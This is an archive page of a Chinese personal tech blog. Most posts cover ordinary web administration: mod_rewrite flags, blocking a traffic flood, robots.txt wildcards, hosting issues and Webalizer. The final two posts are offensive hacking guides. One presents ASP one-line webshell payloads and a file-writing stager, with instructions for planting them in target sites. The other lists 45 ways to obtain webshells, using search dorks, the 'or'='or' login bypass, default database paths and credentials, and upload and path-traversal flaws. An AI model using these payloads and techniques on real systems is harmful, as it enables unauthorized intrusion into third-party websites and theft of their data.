疯狂的柠檬

上帝无用,天使无用

Posts Tagged file

Apache mod_rewrite模块中RewriteCond和RewriteRule的指令格式

十一 7

Posted by CrazyLemon in Apache | 6 Comments| 118 views

RewriteCond指令格式
语法: RewriteCond TestString CondPattern
1) TestString是一个纯文本的字符串,但是可以包含可扩展的成分
2) CondPattern是条件pattern, 即一个应用于当前实例TestString的正则表达式, 即TestString将会被计算然后与CondPattern匹配.
3) 另外,还可以为CondPattern追加特殊的标记[flags] 作为RewriteCond指令的第三个参数。Flags是一个以逗号分隔的以下标记的列表:
‘nocase|NC’  它使测试忽略大小写, 即TestString和CondPattern无大小写检查
‘ornext|OR’  它以OR方式组合若干规则的条件,而不是隐含的AND。

RewriteRule 指令
语法: RewriteRule Pattern Substitution
1) Pattern是一个作用于当前URL的兼容perl的正则表达式. 这里的“当前”是指该规则生效时的URL的值。
2) Substitution是,当原始URL与Pattern相匹配时,用以替代(或替换)的字符串。
3) 此外,Substitution还可以追加特殊标记[flags]  作为RewriteRule指令的第三个参数。 Flags是一个包含以逗号分隔的下列标记的列表:
‘redirect|R [=code]‘ (强制重定向 redirect)
以http://thishost[:thisport]/(使新的URL成为一个URI) 为前缀的Substitution可以强制性执行一个外部重定向。 如果code没有指定,则产生一个HTTP响应代码302(临时性移动)。 如果需要使用在300-400范围内的其他响应代码,只需在此指定这个数值即可, 另外,还可以使用下列符号名称之一: temp (默认的), permanent, seeother. 用它可以把规范化的URL反馈给客户端,如, 重写“/~”为 “/u/”,或对/u/user加上斜杠,等等。

注意: 在使用这个标记时,必须确保该替换字段是一个有效的URL! 否则,它会指向一个无效的位置! 并且要记住,此标记本身只是对URL加上 http://thishost[:thisport]/的前缀,重写操作仍然会继续。 通常,你会希望停止重写操作而立即重定向,则还需要使用’L'标记.

‘forbidden|F’ (强制URL为被禁止的 forbidden)
强制当前URL为被禁止的,即,立即反馈一个HTTP响应代码403(被禁止的)。 使用这个标记,可以链接若干RewriteConds以有条件地阻塞某些URL。
‘gone|G’ (强制URL为已废弃的 gone)
强制当前URL为已废弃的,即,立即反馈一个HTTP响应代码410(已废弃的)。 使用这个标记,可以标明页面已经被废弃而不存在了.
‘proxy|P’ (强制为代理 proxy)
此标记使替换成分被内部地强制为代理请求,并立即(即, 重写规则处理立即中断)把处理移交给代理模块。 你必须确保此替换串是一个有效的(比如常见的以 http://hostname开头的)能够为Apache代理模块所处理的URI。 使用这个标记,可以把某些远程成分映射到本地服务器名称空间, 从而增强了ProxyPass指令的功能。
注意: 要使用这个功能,代理模块必须编译在Apache服务器中。 如果你不能确定,可以检查“httpd -l”的输出中是否有mod_proxy.c。 如果有,则mod_rewrite可以使用这个功能; 如果没有,则必须启用mod_proxy并重新编译“httpd”程序。

‘last|L’ (最后一个规则 last)
立即停止重写操作,并不再应用其他重写规则。 它对应于Perl中的last命令或C语言中的break命令。 这个标记可以阻止当前已被重写的URL为其后继的规则所重写。 举例,使用它可以重写根路径的URL(’/')为实际存在的URL, 比如, ‘/e/www/’.
‘next|N’ (重新执行 next round)
重新执行重写操作(从第一个规则重新开始). 这时再次进行处理的URL已经不是原始的URL了,而是经最后一个重写规则处理的URL。 它对应于Perl中的next命令或C语言中的continue命令。 此标记可以重新开始重写操作,即, 立即回到循环的头部。
但是要小心,不要制造死循环!
‘chain|C’ (与下一个规则相链接 chained)
此标记使当前规则与下一个(其本身又可以与其后继规则相链接的, 并可以如此反复的)规则相链接。 它产生这样一个效果: 如果一个规则被匹配,通常会继续处理其后继规则, 即,这个标记不起作用;如果规则不能被匹配, 则其后继的链接的规则会被忽略。比如,在执行一个外部重定向时, 对一个目录级规则集,你可能需要删除“.www” (此处不应该出现“.www”的)。
‘type|T=MIME-type’ (强制MIME类型 type)
强制目标文件的MIME类型为MIME-type。 比如,它可以用于模拟mod_alias中的ScriptAlias指令, 以内部地强制被映射目录中的所有文件的MIME类型为“application/x-httpd-cgi”.
‘nosubreq|NS’ (仅用于不对内部子请求进行处理 no internal sub-request)
在当前请求是一个内部子请求时,此标记强制重写引擎跳过该重写规则。 比如,在mod_include试图搜索可能的目录默认文件(index.xxx)时, Apache会内部地产生子请求。对子请求,它不一定有用的,而且如果整个规则集都起作用, 它甚至可能会引发错误。所以,可以用这个标记来排除某些规则。

根据你的需要遵循以下原则: 如果你使用了有CGI脚本的URL前缀,以强制它们由CGI脚本处理, 而对子请求处理的出错率(或者开销)很高,在这种情况下,可以使用这个标记。

‘nocase|NC’ (忽略大小写 no case)
它使Pattern忽略大小写,即, 在Pattern与当前URL匹配时,’A-Z’ 和’a-z’没有区别。
‘qsappend|QSA’ (追加请求串 query string append)
此标记强制重写引擎在已有的替换串中追加一个请求串,而不是简单的替换。 如果需要通过重写规则在请求串中增加信息,就可以使用这个标记。
‘noescape|NE’ (在输出中不对URI作转义 no URI escaping)
此标记阻止mod_rewrite对重写结果应用常规的URI转义规则。 一般情况下,特殊字符(如’%', ‘$’, ‘;’等)会被转义为等值的十六进制编码。 此标记可以阻止这样的转义,以允许百分号等符号出现在输出中,如:
RewriteRule /foo/(.*) /bar?arg=P1\%3d$1 [R,NE]

可以使’/foo/zed’转向到一个安全的请求’/bar?arg=P1=zed’.
‘passthrough|PT’ (移交给下一个处理器 pass through)
此标记强制重写引擎将内部结构request_rec中的uri字段设置为 filename字段的值,它只是一个小修改,使之能对来自其他URI到文件名翻译器的 Alias,ScriptAlias, Redirect 等指令的输出进行后续处理。举一个能说明其含义的例子: 如果要通过mod_rewrite的重写引擎重写/abc为/def, 然后通过mod_alias使/def转变为/ghi,可以这样:
RewriteRule ^/abc(.*) /def$1 [PT]
Alias /def /ghi

如果省略了PT标记,虽然mod_rewrite运作正常, 即, 作为一个使用API的URI到文件名翻译器, 它可以重写uri=/abc/…为filename=/def/…, 但是,后续的mod_alias在试图作URI到文件名的翻译时,则会失效。
注意: 如果需要混合使用不同的包含URI到文件名翻译器的模块时, 就必须使用这个标记。。 混合使用mod_alias和mod_rewrite就是个典型的例子。

For Apache hackers
如果当前Apache API除了URI到文件名hook之外,还有一个文件名到文件名的hook, 就不需要这个标记了! 但是,如果没有这样一个hook,则此标记是唯一的解决方案。 Apache Group讨论过这个问题,并在Apache 2.0 版本中会增加这样一个hook。
’skip|S=num’ (跳过后继的规则 skip)
此标记强制重写引擎跳过当前匹配规则后继的num个规则。 它可以实现一个伪if-then-else的构造: 最后一个规则是then从句,而被跳过的skip=N个规则是else从句. (它和’chain|C’标记是不同的!)
‘env|E=VAR:VAL’ (设置环境变量 environment variable)
此标记使环境变量VAR的值为VAL, VAL可以包含可扩展的反向引用的正则表达式$N和%N。 此标记可以多次使用以设置多个变量。 这些变量可以在其后许多情况下被间接引用,但通常是在XSSI (via <!–#echo var=”VAR”–>) or CGI (如 $ENV{’VAR’})中, 也可以在后继的RewriteCond指令的pattern中通过%{ENV:VAR}作引用。 使用它可以从URL中剥离并记住一些信息。
‘cookie|CO=NAME:VAL:domain[:lifetime[:path]]’ (设置cookie)
它在客户端浏览器上设置一个cookie。 cookie的名称是NAME,其值是VAL。 domain字段是该cookie的域,比如’.apache.org’, 可选的lifetime是cookie生命期的分钟数, 可选的path是cookie的路径。

 其实apache手册中有 http://man.chinaunix.net/newsoft/ApacheManual/mod/mod_rewrite.html

  • Share/Bookmark

Tags: , , , , , , , , , , , , , , , , , ,

网站遭遇攻击

十一 5

Posted by CrazyLemon in 虚拟主机 | No Comments| 80 views

一网站受到攻击,看了下,还真有意思

一、攻击时请求的都是子页面,没有请求主页,看来是预先设置或收集了目标站的sitemap

二、攻击来源IP来自全球各地,大约有两百多个,来路域名居然都是http://www.whitehouse.net

这网站像个恶搞白宫的,很早注册,PR值也达到了6,不知道是真来源,还是伪装的,不过基本可以肯定黑客的技术和资源都很不错

三、请求是通过程序处理的,所以CNZZ代码得不到本地执行,无法通过CNZZ得到统计数据

四、最高时每秒并发也只是近百,但足以让服务器响应http 500错误了

五、关了SEO URLS时(主要是去掉.htaccess的rewrite规则),情况好转,因为对方请求的是伪静态子页面,全部404 not found

六、解决办法,收集攻击来源IP,过滤下,在.htaccess里阻止掉,代码如下:

<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from XXX.XXX.XXX.XXX
……

这样做,这些来源IP的请求全部403了,哈哈

经处理,后来攻击停了,持续了5小时左右,看来对方也累

这次bluehost居然没有主动关闭空间,很是奇怪啊,CPU使用率都超高了,访问日志文件也飙得很快

  • Share/Bookmark

Tags: , , , , , , , , ,

zen cart xml sitemap更新

31

Posted by CrazyLemon in ZenCart | 1 Comment| 175 views

如果Use Existing Files这项为true的话,就算用批量表(easy populate)更改了产品信息什么的,xml sitemap也是不认帐的,会判定为产品或目录没更新,直接用现有的xml文件生成,因为它只认数据库表里记录的last modified;而easy populate是不更新这项数据的

所以,需要进后台更改更新下相应的目录或产品,就算不改数据,只是走个形式,重要的是表记录值会有变动

另外,产品名或目录中的空格千万不要弄成全角的,否则显示出来不是空格而是像ii的字符,乱码了

  • Share/Bookmark

Tags: ,

雅虎和谷歌都宣布robots.txt文件支持通配符

28

Posted by CrazyLemon in SEO | No Comments| 139 views

以下是雅虎Search Blog发表的官方声明和robots.txt通配符解决方案:
Yahoo! Search Crawler (Yahoo! Slurp) – Supporting wildcards in robots.txt

I was going through my notes from Danny Sullivan’s Open Feedback sessions that occur during the ?Meet the Crawlers? panel at Search Engine Strategies. One of the items on my list was a request for enhanced syntax in robots.txt to make it easier for webmasters to manage how search crawlers, including Slurp, access your content.

For those who may not be as familiar with search index terminology, webmasters use the robots.txt file to direct robots that visit their site, including search engine crawlers, which files should be crawled and which shouldn’t be. You can read about our support for robots directives in the help for Yahoo! Slurp.

Well, we can scratch that one off the list, since we have just updated Yahoo! Slurp to recognize two additional symbols in the robots.txt directives ? ‘*’ and ‘$’. The semantics of these is what is as widely understood for robots.txt files.

‘*’ – matches a sequence of characters

You can now use ‘*’ in robots directives for Yahoo! Slurp to wildcard match a sequence of characters in your URL. You can use this symbol in any part of the URL string you provide in the robots directive. For example,

User-Agent: Yahoo! Slurp
Allow: /public*/  #允许所有以public开头的目录被索引
Disallow: /*_print*.html
Disallow: /*?sessionid #这句的意思是拒绝一切包含sessionid参数的页面被搜索引擎索引。

The robots directives above will:

allow all directories that begin with ‘public’, such as ‘/public_html/’ or ‘/public_graphs/’ to be crawled
disallow any files or directories which contain ‘_print’, such as ‘/card_print.html’ or ‘/store_print/product.html’ to be crawled
disallow any files with ‘?sessionid’ in their URL string, such as ‘/cart.php?sessionid=342bca31? to be crawled
Note that a trailing ‘*’ is redundant since that is existing matching behavior for Slurp. So, the following two directives are equivalent:

User-Agent: Yahoo! Slurp
Disallow: /private*
Disallow: /private

‘$’ ? anchors at the end of the URL string

You can now also use ‘$’ in robots directives for Slurp to anchor the match to the end of the URL string. Without this symbol, Yahoo! Slurp would match all URLs against the directives, treating the directives as a prefix. For example:

User-Agent: Yahoo! Slurp
Disallow: /*.gif$
Allow: /*?$

The robots directives above will

Disallow all files ending in ‘.gif’ in your entire site. Note that without the ‘$’, this would disallow all files containing ‘.gif’ in their file path
Allow all files ending in ‘?’ to be included. This would not automatically allow files that just contain ‘?’ somewhere in the URL string
As you can see, this symbol only makes sense at the end of the string. Hence, when we see it, we assume that your directive terminates there and any characters after that symbol are ignored.

Oh, by the way, if you thought we didn’t support the ‘Allow’ tag, as you can see from these examples, we do.

If you have any questions about the new syntax or any particular cases you are concerned about, please write in at the Site Explorer forums or read up our area.

Next time you see me at SES, you should ask me what else is on my list!

Priyank Garg
Product Manager, Yahoo! Search

可以用google管理员工具测试,一般第一次提交很快就会抓取robots.txt,然后更新就慢了点

  • Share/Bookmark

Tags: , , , , , , , , , , , , , ,

Godaddy域名续费通知

26

Posted by CrazyLemon in 生活 | No Comments| 94 views

Dear xuexing zhuang,

RENEWAL NOTICE! CRAZYLEMON.NET has not been renewed as of October 22, 2009 and will expire on 01/21/2010.  Renew now and SAVE!**

另一封:

The following domain name(s) are set to automatically renew on the expiration date(s) listed:

 

IMPORTANT: If the credit card we have on file for you has expired or been closed, we will not be able to automatically renew your domain(s). To review and update your credit card information, log in to your account at GoDaddy.com by entering your customer number or user name and password and then clicking “My Account.” When you have accessed the account management area, click the “My Account” button on the left hand side of the screen. Then click the “Credit Cards and Payment Info” link.

提前三个月通知,真够意思的,博客开通九个月了,PR上了3,IP一天有150+,关键字也还好,我不是为SEO而SEO,我只是兴趣,大部份来源是腾讯通RTX破解,寒。。。

该续费了

CRAZYLEMON.NET - Jan. 21, 2010
  • Share/Bookmark

Tags: , , , , , , , , , , , , , ,

bluehost因网站影响服务器性能冻结

26

Posted by CrazyLemon in 虚拟主机 | No Comments| 101 views

前天一朋友为放在我bluehost上的博客购买了付费流量,也就是按月付费,几十块钱,每天能给网站带来几千IP,并承诺一个月内Alexa排名进20万,这个承诺有点胡扯了,不说能不能进,就算进了,本身也是没什么意义的

不过话说回来,进的可能还是大的,因为Alexa排名主要根据网站的非重复IP访问量,Alexa应该有个插件来监测这些数据,不过我感觉好像没用过,估计在中国用的人也不多

对方实现的方式很简单,就是在一个流量较大的网站上挂马,或者是对方自己运营的网站,这类网站有的如小说网,中国喜欢看小说的人多,太费时间了,我是多来不看的

这件事造成了很大麻烦,我真想不到小说有这么多人爱看;首先是公司的bluehost主机被关了,第一反应是侵权,但这些天没排名没广告没出单,前些天的单也过去很久了,老外应该没这么迟钝吧;看了邮件,里面原文如下:

Your web hosting account for XXXXXX.com has been deactivated, as of 10/23/2009. (reason: site causing performance problems)

This deactivation was due to a Terms of Service violation associated with your account. At sign-up, all users state that they have read through, understand, and agree to our terms. These terms are legal and binding.

Although your web site has been suspended, your data may still be available for up to 15 days past the date of deactivation; however, after this time, your account and all of its files, databases, and emails will be deleted.
If you feel this deactivation was made in error, or in order to gain access to your account, please call our customer service line as soon as possible at (888) 401-4678.
Please read the following, derived from our Terms of Service agreement, for additional information regarding the matter.
Engaging in any activity that, in BlueHost.Com’s sole and absolute discretion, disrupts, interferes with, or is harmful to (or threatens to disrupt, interfere with, or be harmful to) BlueHost.Com’s services, BlueHost.Com’s business, operations, reputation, goodwill, subscribers and/or subscriber relations, or the ability of BlueHost.Com’s subscribers to effectively use BlueHost.Com’s services is prohibited.

Please review the current copy of our Terms of Service here:
http://www.bluehost.com/cgi/terms

Thank you,
BlueHost.Com Support
http://www.bluehost.com
For support go to http://helpdesk.bluehost.com/
Toll-Free: (888) 401-4678

原来是网站造成了服务器性能问题,我查了日志,那个博客在一分钟内的请求达到200多次,高并发,造成服务器cpu占用过高,马上被冻结了

第一时间和客服联系上,bluehost的客服响应速度不错,但他们弄错了东西,就是认定是产品站的问题,我可急了,据理力争,让他们查日志去,最后各让一步,我删了那个博客站,总算解冻

如果我没搞错的话,这中间还是有BUG的,不然bluehost也不会搞错网站;客服毕竟是客服,这个,和思力的支持组差不多,汗一个

就像上次IXwebhosting一样,我忘了点应用按钮,以为优惠码不能用了,也是和对方客服争了半天,客服说是优惠码过期,我没办法,后来再试了下,点了应用键,居然行了,看来是客服不太敬业

而有的机子上,就算点了,也是报失效,哈哈,我这电脑的物理地址估计被ixwebhosting加为会员了

  • Share/Bookmark

Tags: , , , , , , , , , , ,

Webalizer

25

Posted by CrazyLemon in 工作 | No Comments| 85 views

ixwebhosting虚拟主机你每建立一个网站都会自动成生Webalizer,关于Webalizer,说明如下:

webalizer是一个高效的、免费的web服务器日志分析程序。其分析结果以HTML文件格式保存,从而可以很方便的通过web服务器进行浏览。Internet上的很多站点都使用webalizer进行web服务器日志分析。Webalizer具有以下一些特性:
  1. 为是用C写的程序,所以其具有很高的运行效率。在主频为200Mhz的机器上,webalizer每秒钟可以分析10000条记录,所以分析一个40M大小的日志文件只需要15秒。
  2. webalizer支持标准的一般日志文件格式(Common Logfile Format);除此之外,也支持几种组合日志格式(Combined Logfile Format)的变种,从而可以统计客户情况以及客户操作系统类型。并且现在webalizer已经可以支持wu-ftpd xferlog日志格式以及squid日志文件格式了。
  3. 支持命令行配置以及配置文件。
  4. 可以支持多种语言,也可以自己进行本地化工作。
  5. 支持多种平台,比如UNIX、linux、NT, OS/2 和 MacOS等。
  安装:
  1.从webalizer的官方站点http://www.mrunix.net/webalizer/下载webalizer,当前的最新版本是webalizer-2.01-06-src.tgz。
  2.首先解开源代码包:
  tar xvzf webalizer-2.01-06-src.tgz
  3.在生成的目录中有个lang目录,该目录中保存了各种语言文件,但是只有繁体中文版本,可以自己转换成简体,或者自己重新翻译一下。
  4.然后进入生成的目录:
  ./configure
  make –with-language=chinese
  5.编译成功后,会产生一个webalizer可执行文件,可以将其拷贝到/usr/sbin/目录下:
  cp webalizer /usr/sbin/
  然后就可以开始配置webalizer了。
  配置:
  上面说过,可以通过命令行配置webalizer,也可以通过配置文件进行配置,在本文中我们将介绍使用命令行参数进行配置,需要了解配置文件使用方法的朋友可以参考README文件,里面有很详细的介绍。
  可以执行webalizer –h得到所有命令行参数:
  Usage: webalizer [options] [log file]
  -h = 打印帮助信息
  -v -V = 打印版本信息
  -d = 打印附加调试信息
  -F type = 日志格式类型. type= (clf | ftp | squid)
  -i = 忽略历史文件
  -p = 保留状态 (递增模式)
  -q = 忽略消息信息
  -Q = 忽略所有信息
  -Y = 忽略国家图形
  -G = 忽略小时统计图形
  -H = 忽略小时统计信息
  -L = 忽略彩色图例
  -l num = 在图形中使用数字背景线
  -m num = 访问超时 (seconds)
  -T = 打印时间信息
  -c file = 指定配置文件
  -n name = 使用的主机名
  -o dir = 结果输出目录
  -t name = 指定报告题目上的主机名
  -a name = 隐藏用户代理名称
  -r name = 隐藏访问链接
  -s name = 隐藏客户
  -u name = 隐藏URL
  -x name = 使用文件扩展名
  -P name = 页面类型扩展名
  -I name = index别名
  -A num = 显示前几名客户类型
  -C num = 显示前几名国家
  -R num = 显示前几名链接
  -S num = 显示前几名客户
  -U num = 显示前几名URLs
  -e num = 显示前几名访问页面
  -E num = 显示前几名不存在的页面
  -X = 隐藏个别用户
  -D name = 使用dns缓存文件
  -N num = DNS 进程数 (0=禁用dns)
  假设,web服务器主机名为www.test.com,统计站点域名为www.test.com, 访问日志为/var/log/httpd/access_log, 我们将webalizer分析结果输出到/var/www/html/log下面。则我们可以建立以下脚本/etc/rc.d/webalizer:
  #!/bin/sh
  run=/usr/sbin/webalizer
  $run -F clf -p -n ” ” -t “www.test.com”
  -o /var/www/html/log /var/log/httpd/access_log
  说明:
  -F clf 指明我们的web日志格式为标准的一般日志文件格式(Common Logfile Format)
  -p 指定使用递增模式,这就是说每作一次分析后,webalizer会生产一个历史文件,这样下一次分析时就可以不分析已经处理过的部分。这样我们就可以在短时间内转换我们的日志文件,而不用担心访问量太大时日志文件无限增大了。
  -n “ “ 指定服务器主机名为空,这样输出结果会美观一些。
  -o “www.test.com” 指定输出结果标题.
  /var/log/httpd/access_log:指定日志文件
  然后在/etc/crontab中加入:
  01 1 * * * root /etc/rc.d/webalizer
  即每天凌晨1点执行该脚本。
  然后运行/etc/rc.d/init.d/crond reload重载入crond服务。
  测试:
  执行以下命令:
  # /etc/rc.d/webalizer
  然后在浏览器中访问http://www.test.com/log/就可以看到webalizer的分析结果了。
  注意:如果您使用了中文语言文件,但是您的linux不支持中文,则在产生的图片中文字可能为乱码。

  • Share/Bookmark

Tags: , , , , , , , , , , , , , , ,

BlueHost主机内存的限制问题(转自bluehostcn.com)

3

Posted by CrazyLemon in 虚拟主机 | 2 Comments| 103 views

有些朋友在使用BlueHost进行程序升级时,会出现如下提示:

Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 2361357 bytes) in /home/xxx/public_html/xxx/xxx/xxx.php on line 1324

显示内存限额太小,搞的没办法,只能上传身份证附件去开通SSH。

其实,这个是可以修改的,解决这个的方法是:

1、在cpanel面板选择php Config,选择PHP5(Single php.ini) 单击保存

2、进入File Manager,进入public_html,找到php.ini,修改 memory_limit = 32M 为 memory_limit = 128M

设置完成后就可以了。

  • Share/Bookmark

Tags: , , , , , ,

一句话木马

29

Posted by CrazyLemon in 黑客技术 | No Comments| 70 views

一句话木马  黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
  <%execute request(”value”)%>
  <%eval request(”value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
  当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request(”value”)%>这个文件被插入到哪一个ASP文件里面就可以了。)
  这就被称为一句话木马,它是基于B/S结构的。
使用方法
  首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库
  或者加进asp网页.
   记住!我们的目的是把一句话<%execute request(”value”)%>添加到数据库,无论任何方式!
  然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后杀进去!,这就可以干你想干的事情了!
  
一句话木马原理

  首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form(’#')+”这句代码,Request.form(’#')的作用是读取客户端文件中html标记属性中name值被命名 为#的部分,例如如下摘自一句话客户端的代码:
  <textarea name=# cols=”80″ rows=”10″>
  set iP=server.createObject(”Adodb.Stream”)
  iP.Open
  iP.Type=2
  iP.CharSet=”gb2312″
  iP.writetext request(”aoyun”)
  iP.SaveToFile server.mappath(”aoyunwan.asp”),2
  iP.Close
  set iP=nothing
  response.redirect “aoyunwan.asp”
  </textarea>
  学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form(’#')),然后执行(使用eval(Request.form(’#')+”)),也就是执行了:
  set iP=server.createObject(”Adodb.Stream”)
  iP.Open
  iP.Type=2
  iP.CharSet=”gb2312″
  iP.writetext request(”aoyun”)
  iP.SaveToFile server.mappath(”aoyunwan.asp”),2
  iP.Close
  set iP=nothing
  response.redirect “aoyunwan.asp”
  学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用对象中的writetext方法将 request(”aoyun”)读取过来的内容(就是我们常见的一句话客户端的第二个textarea域中的内容,也就是我们的大马的代码)写入服务端 的 aoyunwan.asp
  文件中,写入结束后使用set iP=nothing 释放对方 然后使用response.redirect “aoyunwan.asp” 转向写入的文件,就是我们最后见的大马了!
  
关于服务器错误

  经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
  Script error detected at line 1.
  Source line: execute request(”nettoo”)
  Description: 类型不匹配: ‘execute’
  这个如何解决呢?
  想出了一个好办法,只要用”eval”替换掉”execute”服务端,就不会出错了!

  • Share/Bookmark

Tags: , , , , , , , , , ,

拿webshell的45种方法

29

Posted by CrazyLemon in 黑客技术 | No Comments| 204 views

     1.到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!
  2.到Google ,site:cq.cn inurl:asp
  3.利用挖掘鸡和一个ASP木马.
  文件名是login.asp
  路径组是/manage/
  关键词是went.asp
  用’or’='or’来登陆
  4.关键字:Co Net MIB Ver 1.0网站后台管理系统
  帐号密码为 ‘or’='or’
  5.动感购物系统
  inurl:help.asp登陆,如未注册成为会员!
  upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞
  6.默认数据库地址blogdata/acblog.asa
  关键字:acblog
  7.百度 /htdocs
  注册里可以直接上传asa文件!
  8./Database/#newasp.mdb
  关键词:NewAsp SiteManageSystem Version
  9.用挖掘机
  关键字:Powered by WEBBOY
  页面:/upfile.asp
  10.baidu中搜索关键字Ver5.0 Build 0519
  (存在上传漏洞)
  11.Upfile_Article.asp bbs/upfile.asp
  输入关键字:powered by mypower ,
  12.inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站
  13.现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp
  14.键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛
  挖掘鸡的关键字 添 setup.asp
  15.VBulletin论坛的数据库
  默认数据库地址!
  /includes/functions.php
  工具:
  1.网站猎手 下载地址:百度 Google!
  2.Google
  关键字:
  Powered by: vBulletin Version 3.0.1
  Powered by: vBulletin Version 3.0.2
  Powered by: vBulletin Version 3.0.3
  其中一个就可以了
  16.
  1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
  open source。 这是一个商场系统。
  2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
  猜到,comersus.mdb. 是数据库名
  数据库都是放在database/ 后的,
  所以database/comersus.mdb
  comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
  那样把前一个store/除去,再加上database/comersus.mdb 试试
  17.
  无忧传奇官方站点程序。
  1、后台管理地址:http://您的域名/msmiradmin/
  2、默认后台管理帐号:msmir
  3、默认后台管理密码:msmirmsmir
  数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
  数据库连接文件为 ***********/Conn.asp
  18.
  百度里输入/skins/default/
  19.
  利用挖掘机
  关键机:power by Discuz
  路径:/wish.php
  配合:
  Discuz!论坛 wish.php远程包含漏洞 工具使用
  20.
  上传漏洞.
  工具 : Domain3.5
  网站猎手 1.5版
  关键字powered by mypower
  检测的页面或文件插入upfile_photo.asp
  21.
  新云漏洞
  这个漏洞ACCESS和SQL版通吃。
  Google搜索关键字 “关于本站 – 网站帮助 – 广告合作 – 下载声明 – 友情连接 – 网站地图 – 管理登录”
  把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
  以源码,软件等下载站居多。
  大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
  \database\%23newasp.mdb
  如:#xzws.mdb 改成%23xzws.mdb
  22.
  通吃所有商城+动力上传系统
  使用工具:挖掘鸡 v1.1 明小子
  商城入侵:
  关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
  漏洞页面:upload.asp
  upfile_flash.asp
  动力入侵:
  关键字:powered by mypower
  漏洞页面:upfile_photo.asp
  Upfile_Soft.asp
  upfile_adpic.asp
  upfile_softpic.asp
23.注射漏洞
  百度搜

索:oioj’s blog
  24
  动易
  列目录
  admin_articlerecyclebin.asp
  inurl:admin_articlerecyclebin.asp
  25.
  工具:网站猎手
  关键词:inurl:Went.asp
  后缀:manage/login.asp
  口令:’or’='or’
  26.
  入侵魔兽私服
  需要的工具:ASP木马一只。
  Domain3.5明小子
  关键字:All Right Reserved Design:游戏联盟
  后台地址:admin/login.asp
  数据库的地址:chngame/#chngame.mdb
  27.
  漏洞是利用管理员iis设置的失误
  用baidu 关键字就是比较罕见的脚本名
  动网: ReloadForumCache.asp
  Leadbbs: makealltopanc.asp
  BBSXP: admin_fso.asp
  动易: admin_articlerecyclebin.asp
  28.
  国外站的爆库漏洞
  关键字:sad Raven’s Guestbook
  密码地址:/passwd.dat
  后台地址:/admin.php
  29.
  Discuz 4.1.0跨站漏洞
  利用工具:1,WAP浏览器
  2,WAP编码转换器
  关键字:”intext:Discuz! 4.1.0″
  30.
  关键字:尚奈克斯
  后台路径/system/manage.asp
  直接传ASP木马
  31.
  工具
  1:网站猎手
  2:大马一个
  关键字:切勿关闭Cookies功能,否则您将不能登录
  插入diy.asp
  32.
  关键字:Team5 Studio All rights reserved
  默认数据库:data/team.mdb
  33.
  工具: 挖掘机 辅臣数据库读取器
  关键字: 企业简介 产品展示 产品列表
  后缀添加: /database/myszw.mdb
  后台地址: admin/Login.asp
  34.
  关键子 XXX inurl:Nclass.asp
  在”系统设置”里写个木马。
  会被保存到 在 config.asp内。
  35.
  不进后台照样拿动网WEBSHELL
  data.asp?action=BackupData 动网数据库备份默认路径
  36.
  工具:网站猎手 WebShell
  关键字:inurl:Went.asp
  后缀:manage/login.asp
  弱口令:’or’='or’
  37.
  关键字:Powered by:QCDN_NEWS
  随便扫遍文章加一个’ ,来试探注入点
  后台地址:admin_index.asp
  38.
  入侵雷池新闻发布系统
  关键字:leichinews
  去掉leichinews后面的.
  打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
  再上传马…..
  进访问uppic anran.asp 登陆马.
  39.
  关键字:Power System Of Article Management Ver 3.0 Build 20030628
  默认数据库:database\yiuwekdsodksldfslwifds.mdb
  后台地址:自己扫描!
  40.
  一、通过GOOGLE搜索找大量注入点
  关键字:asp?id=1 gov.jp/ asp?id=
  页数:100
  语言:想入侵哪个国家就填什么语言吧
  41.
  关键字:Powered by:94KKBBS 2005
  利用密码找回功能 找回admin
  提问:ddddd 回答:ddddd
  42.
  关键字:inurl:Went.asp
  后台为manage/login.asp
  后台密码: ‘or’=’ 或者 ‘or=or’ 登录 进入
  默认数据库地址:Database/DataShop.mdb
  43.
  关键字:****** inurl:readnews.asp
  把最后一个/改成%5c ,直接暴库,看密码,进后台
  随便添加个新闻 在标题输入我们的一句话木马
  44.
  工具:一句话木马
  BBsXp 5.0 sp1 管理员猜解器
  关键词:powered by bbsxp5.00
  进后台,备份一句话马!
  45.
  关键字:程序核心:BJXSHOP网上开店专家
  后台:/admin

  • Share/Bookmark

Tags: , , , , , , , , , , , , , , , ,